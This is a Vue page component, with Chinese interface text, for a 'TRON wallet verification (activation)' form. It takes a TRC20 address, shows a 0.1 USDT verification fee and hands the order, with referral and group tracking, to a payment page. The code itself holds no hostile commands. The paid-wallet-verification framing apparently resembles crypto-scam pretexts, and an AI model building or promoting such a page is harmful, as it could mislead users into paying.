<template>
    <div class="app-container">
      <!-- 顶部导航栏 -->
      <a-layout-header class="navbar-custom-padding">
        <div class="container-head">
          <a-row type="flex" align="middle" :gutter="[16, 16]" class="header-row">
            <a-col :xs="12" :sm="12" :md="12" :lg="12" :xl="12">
              <a id="dynamic-link" class="navbar-brand">
                <img src="../assets/xinbi.jpg" alt="LOGO" class="logo-img">
                钱包验证（激活）
              </a>
            </a-col>
            <a-col :xs="12" :sm="12" :md="12" :lg="12" :xl="12" class="text-right">
              <!-- 可以添加更多导航项 -->
            </a-col>
          </a-row>
        </div>
      </a-layout-header>
  
      <!-- 主要内容区域 -->
      <a-layout-content class="main-content">
        <!-- 商品信息板块 -->
        <section class="commodity-html">
          <div class="container">
            <a-row :gutter="[16, 16]" class="content-row">
              <a-col :xs="24" :sm="24" :md="24" :lg="24" :xl="24">
                <a-card class="bg-white shadow-sm main-card">
                  <a-row :gutter="[16, 16]">
                    <!-- 商品图片展示 -->
                    <a-col 
                      :xs="24" :sm="24" :md="10" :lg="10" :xl="10"
                      class="image-column"
                    >
                      <div class="view-product text-center">
                        <img class="cover img-fluid product-image-border" 
                             :src="productImage" alt="商品图片">
                        <h3 class="commodity_name mobile-title">TRON区块链地址验证</h3>
                      </div>
                    </a-col>
                    
                    <!-- 商品购买信息 -->
                    <a-col 
                      :xs="24" :sm="24" :md="14" :lg="14" :xl="14"
                      class="form-column"
                    >
                      <div class="open-commodity">
                        <a-form class="commodity-form commodity-di" layout="vertical">
                          <p class="commodity_name desktop-title">TRON区块链地址验证</p>
                          
                          <!-- 发货方式 -->
                          <a-form-item class="form-item-compact">
                            <p class="general">绑定方式自助绑定</p>
                          </a-form-item>

                          <!-- 商品规格选择 -->
                          <a-form-item class="form-item-normal">
                            <p class="form-label">商品名称:</p>
                            <a-select 
                              id="skuSelect" 
                              v-model:value="selectedService" 
                              size="large"
                              class="responsive-select"
                            >
                              <a-select-option value="新币钱包验证">新币钱包验证</a-select-option>
                            </a-select>
                          </a-form-item>
                          
                        
                          <!-- 联系方式 -->
                          <a-form-item class="form-item-normal">
                            <p class="form-label">绑定地址:</p>
                            <a-input 
                              id="contact" 
                              v-model:value="refundAddress"
                              class="responsive-input"
                              placeholder="输入绑定地址，TRC20地址" 
                            />
                          </a-form-item>
                          
                        
                      
                          
                          <!-- 订单金额 -->
                          <a-form-item class="form-item-compact">
                            <p class="general">验证金额：<span class="trade_amount">{{ verifyPrice }}U</span></p>
                          </a-form-item>
                          
                          <!-- 结账按钮 -->
                          <div class="pay-content">
                           
                            <div class="pay_list">
                              <a-button 
                                id="usdtButton" 
                                @click="handleSubmit"
                                class="responsive-button"
                              >
                                <img src="../assets/usdt.png" alt="" class="button-icon">
                                点击验证
                              </a-button>
                            </div>
                          </div>
                        </a-form>
                      </div>
                    </a-col>
                  </a-row>
                </a-card>
              </a-col>
            </a-row>
          </div>
        </section>
      </a-layout-content>
      
      <!-- 页脚 -->
      <a-layout-footer class="footer">
        
        
        <div class="copyright">
          <p>Powered by TRON Blockchain</p>
        </div>
      </a-layout-footer>
    </div>
  </template>
  
  <script>
import { resolveReferralContext } from '../util/deeplink';
import { serializePaymentPayload } from '../util/paymentFlow';
  import { ref, onMounted } from 'vue';
  import { message, Form, Select } from 'ant-design-vue';
  import { addOrder } from '../util/api'; 
  import { useRouter, useRoute } from 'vue-router';
  import { loadSpecialProduct, resolveLinkKey, applySpecialProductPrice } from '../util/specialProduct';
  import defaultProductImg from '../assets/xinbi.jpg';
  
  export default {
    components: {
      'a-form-item': Form.Item,
      'a-select': Select,
      'a-select-option': Select.Option,
    },
    name: 'RefundPage',
    setup() {
      // 响应式数据
      const selectedService = ref('新币钱包验证');
      const selectedCountry = ref('');
      const refundAddress = ref('');
      const referral_code = ref('');
        const gameGroupId = ref('');
      const quantity = ref(1);
      const showCountrySelection = ref(false);
      const showQuantity = ref(false);
      const productImage = ref(defaultProductImg);
      const verifyPrice = ref(0.1);
      const router = useRouter();
      const route = useRoute();

      const getCurrentDateTime  = () => {
            const date = new Date();
            const year = date.getFullYear();
            const month = ("0" + (date.getMonth() + 1)).slice(-2);
            const day = ("0" + date.getDate()).slice(-2);
            const hours = ("0" + date.getHours()).slice(-2);
            const minutes = ("0" + date.getMinutes()).slice(-2);
            const seconds = ("0" + date.getSeconds()).slice(-2);
            return `${year}${month}${day}${hours}${minutes}${seconds}`;
      };
      
      // 方法
      const handleSubmit = async () => {
        if (!refundAddress.value) {
          message.warning('请输入绑定地址');
          return;
        }
     
        const tronAddressRegex = /^T[1-9A-HJ-NP-Za-km-z]{33}$/;
        if (!tronAddressRegex.test(refundAddress.value)) {
          message.warning('请输入正确的 TRC20 地址');
          return;
        }
        
        try {
       
          
          let str = getCurrentDateTime() + Math.floor(Math.random() * 100000).toString().padStart(6, '0');
          let data = {
              price: verifyPrice.value,
              inputNumber:1,
              inputGT:refundAddress.value,
              orderNo: str,
              title:"钱包验证",
              referral_code:referral_code.value
          }

          await addOrder(data)

          router.push({ name: 'Payment', params: { data: serializePaymentPayload(data, gameGroupId.value) } });

        } catch (error) {
          console.error('提交失败:', error);
          message.error('处理请求时发生错误，请稍后重试');
        } 


      };

       // 初始化生成号码
       onMounted(async () => {
        const referralCtx = resolveReferralContext(route);
        referral_code.value = referralCtx.referralCode;
        gameGroupId.value = referralCtx.gameGroupId;
        const key = resolveLinkKey(route) || 'xinbi_actity';
        const product = await loadSpecialProduct(key, {});
        if (product.src) {
          productImage.value = product.src;
        }
        verifyPrice.value = applySpecialProductPrice(product, verifyPrice.value);
      });
      
      return {
        selectedService,
        selectedCountry,
        refundAddress,
        quantity,
        showCountrySelection,
        showQuantity,
        productImage,
        verifyPrice,
        handleSubmit
      };
    }
  };
  </script>
  
  <style scoped>
  /* 基础样式 */
  .app-container {
    background-color: #f0f0f0;
    min-height: 100vh;
  }
  
  /* 响应式容器 */
  .container {
    max-width: 1200px;
    margin: 0 auto;
    padding: 0 16px;
    background-color: #fff;
  }

    /* 响应式容器 */
    .container-head {
        max-width: 1200px;
        margin: 0 auto;
        padding: 0 16px;
        background-color: #fff;
    }
  
  /* 顶部导航栏响应式 */
  .navbar-custom-padding {
    background-color: #fff;
    box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
  }
  
  .header-row {
    padding: 20px 0;
  }
  
  .navbar-brand {
    display: flex;
    align-items: center;
    text-decoration: none;
    color: #343a40;
    font-size: 22px;
    font-weight: bold;
  }
  
  .logo-img {
    height: 30px;
    width: auto;
    margin-right: 10px;
  }
  
  .text-right {
    text-align: right;
  }
  
  /* 主要内容区域响应式 */
  .main-content {
    margin-bottom: 20px;
  }
  
  .commodity-html {
    margin-top: 20px;
  }
  
  .content-row {
    padding: 1.5rem !important;
  }
  
  .main-card {
    border-radius: 8px;
  }
  
  /* 图片区域响应式 */
  .image-column {
    display: flex;
    justify-content: center;
    align-items: flex-start;
  }
  
  .view-product {
    width: 100%;
  }
  
  .product-image-border {
    border: 5px solid #ddd;
    border-radius: 10px;
    padding: 5px;
    box-shadow: 0px 0px 10px #ccc;
    max-width: 100%;
    height: auto;
  }
  
  /* 标题响应式 */
  .commodity_name {
    font-weight: bold;
    margin: 0;
  }
  
  .desktop-title {
    display: block;
    font-size: 24px;
  }
  
  .mobile-title {
    display: none;
    font-size: 20px;
    margin-top: 16px;
  }
  
  /* 表单区域响应式 */
  .form-column {
    padding-left: 16px;
  }
  
  .form-item-compact {
    margin-bottom: 0.5rem !important;
  }
  
  .form-item-normal {
    margin-bottom: 1rem !important;
  }
  
  .form-label {
    font-size: 20px;
    font-weight: 400;
    margin: 0 0 0.2rem 0;
  }
  
  .general {
    font-size: 17px;
    margin: 0;
  }
  
  /* 表单元素响应式 */
  .responsive-select {
    width: 100%;
  }
  
  .responsive-input {
    width: 100%;
    font-size: 20px;
    font-weight: 400;
  }
  
  .responsive-input-number {
    width: 100%;
  }
  
  /* 库存信息 */
  .stock-info {
    font-size: 15px;
    font-weight: 400;
    color: #868e96 !important;
  }
  
  /* 按钮区域响应式 */
  .pay-content {
    padding-bottom: 30px;
  }
  
  .pay_title {
    font-size: 17px;
    margin-bottom: 16px;
  }
  
  .pay_list {
    display: flex;
    flex-wrap: wrap;
    gap: 8px;
  }
  
  .responsive-button {
    display:flex;
    height: 47px;
    padding:.5rem 1.1rem;
    font-size:.875rem;
    font-size: 16px;
    border-color:#6b6c6d;
    border-radius:1.078em;
  }
  
  .button-icon {
    height: 29px;
    margin-right: 8px;
  }
  
  /* 页脚响应式 */
  .footer {
    background-color: #f0f0f0;
    margin-top: 20px;
  }
  
  .footer-container {
    padding: 20px 16px;
    min-height: 120px;
  }
  
  .rules-section {
    text-align: left;
  }
  
  .description-title {
    margin: 0 0 16px 0;
    padding-left: 24px;
    padding-top: 20px;
    font-size: 20px;
  }
  
  .rules-content {
    margin: 0;
    padding-left: 16px;
    font-size: 16px;
    line-height: 1.5;
  }
  
  .copyright {
    text-align: center;
    padding: 20px 0;
    border-top: 1px solid #e8e8e8;
  }
  
  /* 移动端样式 */
  @media (max-width: 768px) {
    .container {
      padding: 0 12px;
    }
    
    .header-row {
      padding: 15px 0;
    }
    
    .navbar-brand {
      font-size: 18px;
    }
    
    .logo-img {
      height: 25px;
    }
    
    .content-row {
      padding: 1rem !important;
    }
    
    .desktop-title {
      display: none;
    }
    
    .mobile-title {
      display: block;
    }
    
    .form-column {
      padding-left: 0;
      margin-top: 20px;
    }
    
    .form-label {
      font-size: 18px;
    }
    
    .general {
      font-size: 16px;
    }
    
    .responsive-input {
      font-size: 18px;
    }
    
    .description-title {
      padding-left: 16px;
      font-size: 18px;
    }
    
    .rules-content {
      padding-left: 12px;
      font-size: 14px;
    }
    
    .responsive-button {
      height: 44px;
      font-size: 15px;
    }
    
    .button-icon {
      height: 25px;
    }
  }
  
  /* 超小屏幕样式 */
  @media (max-width: 576px) {
    .container {
      padding: 0 8px;
    }
    
    .navbar-brand {
      font-size: 16px;
    }
    
    .logo-img {
      height: 22px;
      margin-right: 8px;
    }
    
    .content-row {
      padding: 0.5rem !important;
    }
    
    .commodity_name {
      font-size: 18px;
    }
    
    .form-label {
      font-size: 16px;
    }
    
    .general {
      font-size: 14px;
    }
    
    .responsive-input {
      font-size: 16px;
    }
    
    .stock-info {
      font-size: 13px;
    }
    
    .description-title {
      padding-left: 12px;
      font-size: 16px;
    }
    
    .rules-content {
      padding-left: 8px;
      font-size: 13px;
    }
    
    .pay_title {
      font-size: 15px;
    }
    
    .responsive-button {
      height: 40px;
      font-size: 14px;
    }
    
    .button-icon {
      height: 22px;
      margin-right: 6px;
    }
  }
  
  /* 大屏幕样式 */
  @media (min-width: 1200px) {
    .container {
      max-width: 960px;
    }

    .container-head {
      max-width: 1400px;
      padding-left: 230px;
    }
    
    .product-image-border {
      max-width: 300px;
    }
  }
  
  /* 超大屏幕样式 */
  @media (min-width: 1600px) {
    .container {
      max-width: 1400px;
    }
    
    .product-image-border {
      max-width: 600px;
    }
    
    .commodity_name {
      font-size: 26px;
    }
    
    .form-label {
      font-size: 22px;
    }
    
    .general {
      font-size: 18px;
    }
  }
  </style>